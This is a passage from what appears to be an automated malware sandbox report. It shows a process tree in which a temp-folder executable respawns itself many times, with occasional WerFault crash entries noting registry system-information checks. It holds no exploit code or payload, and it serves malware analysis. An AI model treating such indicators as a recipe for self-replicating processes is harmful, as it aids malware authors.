        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5676
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5756
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5796
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4624
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7208
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4424
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8172
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2260
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1316
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7656
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6920
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4508
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7152
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7656
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7504
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1620
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7684
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3392
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7212
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1100
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7044
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1576
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7028
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6572
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6572 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:3916
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4736
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6472
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7892
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7524
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6856
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6844
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3324
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8276
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8364
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8448
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8468
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8808
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9008
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9112
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9204
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8308
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8416
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 8416 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:6576
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8504
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8840
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8864
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8888
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9068
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9136
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8336
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7880
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2948
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8568
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8420
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8404
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8528
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7152
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9068
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6276
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8500
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7764
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8284
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6136
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9036
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2076
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9072
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8388
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8320
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8424
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8716
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5036
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8332
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8352
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:1168
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8776
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3772
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8904
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8224
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9192
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8628
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8036
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7892
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8600
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2160
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8536
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8920
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8356
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9104
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6760
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3792
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7824
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:2956
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8584
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4472
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6896
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5704
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8516
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:5940
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8492
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8664
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8784
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7436
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:6480
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3212
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4632
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:3204
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8560
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9260
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9308
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9396
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9484
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9576
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9672
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 9672 -s 28
        7⤵
        Program crash
        Checks processor information in registry
        Enumerates system info in registry
        
        PID:9836
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9760
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9892
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9228
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9452
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:4952
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8800
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:8240
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9736
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:7932
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
        C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        6⤵
        
        PID:9964
      - C:\Users\Admin\AppData\Local\Temp\7zS8735AFE3\Tue11e4e580f2e8141a3.exe
        
